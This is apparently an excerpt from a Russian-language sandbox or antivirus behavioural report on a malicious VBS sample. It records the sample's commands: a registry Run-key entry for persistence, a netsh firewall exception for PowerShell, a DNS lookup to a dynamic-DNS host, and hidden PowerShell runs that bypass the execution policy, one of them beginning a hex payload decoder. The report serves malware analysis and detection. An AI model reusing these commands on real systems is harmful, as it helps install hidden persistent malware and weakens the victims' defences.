Техническая информация
- Закрепление в системе через автозапуск (ключ реестра Run текущего пользователя): [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'FileName' = '<PATH_SAMPLE>.vbs'
- Изменение настроек брандмауэра Windows (powershell.exe добавляется в список разрешённых программ): '<SYSTEM32>\netsh.exe' firewall add allowedprogram "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
- DNS-запрос (DNS ASK): ch####.myq-see.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value '<PATH_SAMPLE>.vbs' -PropertyType Stri...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]:...' (со скрытым окном; команда в отчёте обрезана, в видимой части объявляется функция H2B, которая разбирает строку по два символа в массив байтов)
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'FileName' -value '<PATH_SAMPLE>.vbs' -PropertyType Stri...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]:...